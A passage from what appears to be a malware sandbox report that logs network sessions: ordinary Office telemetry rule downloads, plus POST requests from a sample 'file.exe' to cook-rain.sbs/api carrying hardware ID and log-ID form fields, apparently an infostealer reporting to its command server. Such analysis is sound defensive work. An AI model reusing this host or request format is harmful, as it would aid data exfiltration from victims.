                                                                                                                                                                      Data Ascii: dInog3hkwN2YQcMoFi8/f47pRxRt1qLnymT5aVHfM4E3jqXRciKbi7YU+gY4fxRogKc2BifZ9/KaO5QZPN90yXSLg/kiFY6etV3DeFstCzjbpSoZJN/hs68G6BYHznPXcIm5jXlkjt3tAIp4By1LOMTrCgogweHjmDqpMRKKTedYwqfTbTWVmaNt+h8TaBRGvdIWDDONxPKcP+ppUdUzgTfuoMZnZNbdsROceDpmEmiO9AoPNY3F94876mlRwTO


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      3192.168.2.64971213.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:18 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:18 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:18 GMT
                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                      Content-Length: 218853
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public
                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 16:37:24 GMT
                                                                                                                                                                      ETag: "0x8DD08B87243495C"
                                                                                                                                                                      x-ms-request-id: b5254561-a01e-0070-0158-3b573b000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052318Z-r1d97b99577ndm4rhC1TEBf0ps00000009xg00000000kna4
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:18 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                      Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                      2024-11-21 05:23:19 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                                                                                                                                      Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                                                                                                                                                                      2024-11-21 05:23:19 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                                                                                                                                                      Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
                                                                                                                                                                      2024-11-21 05:23:19 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                                                                                                                                                      Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                                                                                                                                                                      2024-11-21 05:23:19 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                                                                                                                                                      Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                                                                                                                                                                      2024-11-21 05:23:19 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                                                                                                                                                      Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                                                                                                                                                                      2024-11-21 05:23:19 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                                                                                                                                                      Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                                                                                                                                                      2024-11-21 05:23:19 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                                                                                                                                                      2024-11-21 05:23:19 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                                                                                                                                                      2024-11-21 05:23:19 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                                                                                                                                                      Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      4192.168.2.649713188.114.97.34431600C:\Users\user\Desktop\file.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:18 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=9RWAOTAZ79
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 12817
                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                      2024-11-21 05:23:18 UTC12817OUTData Raw: 2d 2d 39 52 57 41 4f 54 41 5a 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 36 35 43 41 37 43 42 41 39 36 36 43 37 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 39 52 57 41 4f 54 41 5a 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 52 57 41 4f 54 41 5a 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 39 52 57 41 4f 54 41 5a 37 39 0d 0a 43 6f
                                                                                                                                                                      Data Ascii: --9RWAOTAZ79Content-Disposition: form-data; name="hwid"B065CA7CBA966C7B63CFCF7E6C45F838--9RWAOTAZ79Content-Disposition: form-data; name="pid"2--9RWAOTAZ79Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--9RWAOTAZ79Co
                                                                                                                                                                      2024-11-21 05:23:19 UTC986INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:19 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=ejl6vodedcfoishmgg1e7dsk4g; expires=Sun, 16-Mar-2025 23:09:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2xP4EGldHo7ptJk6r5ZIK81Pyflq46DvowoZPMk6mVbebjgX69sqOmVo%2BeCdzh0BMrmsDZqn7ufTcBdU%2FUV%2FblrtbUJ%2F5QEDV6cKJed3wRcuyQEMviSBO5sXYRnlokn5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e5e3f3cb9ef729f-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1796&sent=13&recv=17&lost=0&retrans=0&sent_bytes=2830&recv_bytes=13746&delivery_rate=1569048&cwnd=159&unsent_bytes=0&cid=2bf4287b342c8ff9&ts=902&x=0"
                                                                                                                                                                      2024-11-21 05:23:19 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                      Data Ascii: eok 8.46.123.75
                                                                                                                                                                      2024-11-21 05:23:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      5192.168.2.649719188.114.97.34431600C:\Users\user\Desktop\file.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:21 UTC269OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=7M3DX5T7
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 15051
                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                      2024-11-21 05:23:21 UTC15051OUTData Raw: 2d 2d 37 4d 33 44 58 35 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 36 35 43 41 37 43 42 41 39 36 36 43 37 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 37 4d 33 44 58 35 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 4d 33 44 58 35 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 37 4d 33 44 58 35 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                      Data Ascii: --7M3DX5T7Content-Disposition: form-data; name="hwid"B065CA7CBA966C7B63CFCF7E6C45F838--7M3DX5T7Content-Disposition: form-data; name="pid"2--7M3DX5T7Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--7M3DX5T7Content-Di
                                                                                                                                                                      2024-11-21 05:23:22 UTC996INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:22 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=8itqc7catljqi8g4d7h68eo1bo; expires=Sun, 16-Mar-2025 23:10:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9iazBijQ%2BHOQbfGA56MCN6uwbEm1Y5k25Kvk7v329%2FeLyfRd%2BDQwW0OrzOVX7c6ujI%2BUTihrWW4t5w%2FH0V%2FyaVJxF63EYPacYuImCzb%2BmJQ4CSNc%2B9WUvAopJeBn%2Fn1Z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e5e3f4b3cee4258-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1595&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2828&recv_bytes=15978&delivery_rate=1784841&cwnd=186&unsent_bytes=0&cid=f3f60df3eac154a9&ts=984&x=0"
                                                                                                                                                                      2024-11-21 05:23:22 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                      Data Ascii: eok 8.46.123.75
                                                                                                                                                                      2024-11-21 05:23:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      6192.168.2.64971413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:21 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:21 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:21 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 3788
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                      ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                      x-ms-request-id: b2486168-801e-0048-04ba-3bf3fb000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052321Z-r1d97b995774zjnrhC1TEBv1ww00000009s000000000mtpr
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:21 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      7192.168.2.64971813.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:21 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:21 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 408
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                      ETag: "0x8DC582BB56D3AFB"
